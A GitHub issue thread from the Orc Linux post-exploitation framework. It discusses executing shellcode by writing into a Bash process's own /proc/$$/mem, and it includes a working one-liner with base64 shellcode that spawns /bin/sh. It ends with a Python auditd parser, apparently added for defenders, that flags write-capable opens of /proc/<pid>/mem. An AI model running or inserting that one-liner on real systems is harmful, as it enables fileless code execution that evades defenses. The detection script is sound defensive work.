zMarch / Orc

Orc is a post-exploitation framework for Linux written in Bash
MIT License
390 stars 51 forks

Shellcode Execution #79

Open darrenmartyn opened 3 years ago

darrenmartyn commented 3 years ago

We can probably implement this trickery so we can execute arbitrary shellcode. Maybe as a helper function?

https://twitter.com/David3141593/status/1386663070991360001

The example pops /bin/sh

cd /proc/$$;read a<syscall;exec 3>mem;base64 -d<<<McBIu9GdlpHQjJf/SPfbU1RfmVJXVF6wOw8F|dd bs=1 seek=$[`echo $a|cut -d" " -f9`]>&3

We could use this as another way to do the memexec using memfds by implementing the memfd loader as shellcode (something I actually did before, I'll just have to find the code).

UlrichBerntien commented 3 years ago

Currently, a Python 2 and Python 3 script memexec.py and a Perl script memexec.pl are included in o.rc. In o.rc the interpreter is searched for and the gzip|base64-encoded script is executed in the memexec function.

As far as I understand the trick: it stores the shellcode in the bash process memory /proc/$$/mem ($$ = pid of the bash). The address inside the process memory is taken from a /proc/$$/syscall argument. But I have not figured out how the trick controls which syscall is the current syscall of the process. I have to dig deeper. An interesting trick.

Logic must be implemented to decide when to use the scripts and when to use the trick.
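From the defender's side of this thread, the observable that both comments describe is a process opening its own /proc/<pid>/mem for writing (the `exec 3>mem` after `cd /proc/$$`). The following is an added example, not Orc code and not from either commenter: it groups auditd records by event serial, joins the CWD record to the relative PATH name (the one-liner opens the bare name "mem" from inside /proc/$$, so a detection that only inspects the PATH record misses it), decodes the open/openat flags and reports write-capable opens of /proc/<pid>/mem, marking whether the process targeted itself. The audit rule key "proc-mem" and every log line below are constructed for the example; the syscall numbers and flag bits are the x86_64 values.

```python
"""Flag write-capable opens of /proc/<pid>/mem in auditd output.

Added example for the /proc/$$/mem discussion in this issue; not part of Orc.
It assumes an auditd syscall rule that records open/openat (the rule key
"proc-mem" and all log lines below are constructed for the example).
"""
import posixpath
import re
from collections import defaultdict

# open(2) access-mode bits (asm-generic values, valid on x86_64)
O_WRONLY, O_RDWR, O_ACCMODE = 0o1, 0o2, 0o3
# x86_64 syscall numbers and the argument slot that carries the flags:
# open(path, flags, mode) -> a1 ; openat(dirfd, path, flags, mode) -> a2
OPEN_SYSCALLS = {2: "a1", 257: "a2"}

MEM_RE = re.compile(r"^/proc/(\d+|self)/mem$")
HDR_RE = re.compile(r"^type=(\w+) msg=audit\([\d.]+:(\d+)\): (.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed auditd records. Event 501: a shell running the one-liner from the
# issue (cd /proc/$$; exec 3>mem) opens the *relative* name "mem" for writing,
# so the target only becomes visible once CWD is joined to PATH. Event 502 is
# a benign read-only open of /proc/1234/maps. Event 503 is a debugger opening
# another process's mem read-write.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1700000000.100:501): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=55d0c8a1e2a0 a2=241 a3=1b6 items=1 ppid=1200 pid=1234 auid=1000 uid=1000 comm="bash" exe="/usr/bin/bash" key="proc-mem"
type=CWD msg=audit(1700000000.100:501): cwd="/proc/1234"
type=PATH msg=audit(1700000000.100:501): item=0 name="mem" inode=12345 dev=00:05 mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.200:502): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7ffc1a2b3c40 a2=0 a3=0 items=1 ppid=1200 pid=1300 auid=1000 uid=1000 comm="cat" exe="/usr/bin/cat" key="proc-mem"
type=CWD msg=audit(1700000000.200:502): cwd="/home/user"
type=PATH msg=audit(1700000000.200:502): item=0 name="/proc/1234/maps" inode=12346 dev=00:05 mode=0100444 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.300:503): arch=c000003e syscall=257 success=yes exit=9 a0=ffffff9c a1=5602aa11bb00 a2=2 a3=0 items=1 ppid=4000 pid=4321 auid=1000 uid=1000 comm="gdb" exe="/usr/bin/gdb" key="proc-mem"
type=CWD msg=audit(1700000000.300:503): cwd="/home/user"
type=PATH msg=audit(1700000000.300:503): item=0 name="/proc/5678/mem" inode=12347 dev=00:05 mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL
"""


def parse_record(line):
    """Split one auditd line into (type, serial, {field: value}) or None."""
    m = HDR_RE.match(line.strip())
    if not m:
        return None
    rtype, serial, rest = m.groups()
    fields = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
    return rtype, int(serial), fields


def group_events(log_text):
    """auditd spreads one event over several lines sharing a serial; regroup them."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec:
            rtype, serial, fields = rec
            events[serial].append((rtype, fields))
    return events


def find_mem_writes(log_text):
    """Return one finding per write-capable open of /proc/<pid>/mem."""
    findings = []
    for serial, records in sorted(group_events(log_text).items()):
        sys_rec = next((f for t, f in records if t == "SYSCALL"), None)
        if sys_rec is None:
            continue
        flags_arg = OPEN_SYSCALLS.get(int(sys_rec.get("syscall", -1)))
        if flags_arg is None:
            continue  # not open/openat
        flags = int(sys_rec[flags_arg], 16)  # auditd prints syscall args in hex
        if (flags & O_ACCMODE) not in (O_WRONLY, O_RDWR):
            continue  # read-only opens of /proc/<pid>/mem are common and benign
        cwd = next((f["cwd"] for t, f in records if t == "CWD"), "/")
        for rtype, f in records:
            if rtype != "PATH":
                continue
            # Relative names (the "mem" in event 501) resolve against the CWD record.
            path = posixpath.normpath(posixpath.join(cwd, f["name"]))
            m = MEM_RE.match(path)
            if not m:
                continue
            target = m.group(1)
            findings.append({
                "serial": serial,
                "pid": sys_rec["pid"],
                "comm": sys_rec.get("comm"),
                "exe": sys_rec.get("exe"),
                "path": path,
                # A process writing its *own* mem is the pattern in this issue;
                # debuggers normally write to some other process.
                "self_write": target == "self" or target == sys_rec["pid"],
            })
    return findings


if __name__ == "__main__":
    for hit in find_mem_writes(SAMPLE_LOG):
        print(hit)
```

Run with `python3`: events 501 and 503 are reported, 502 is not. Debuggers and tracing tools will also show up as write-capable opens, so in practice the `self_write` flag (or an allow-list on `exe`) is what separates the pattern in this issue from tooling noise.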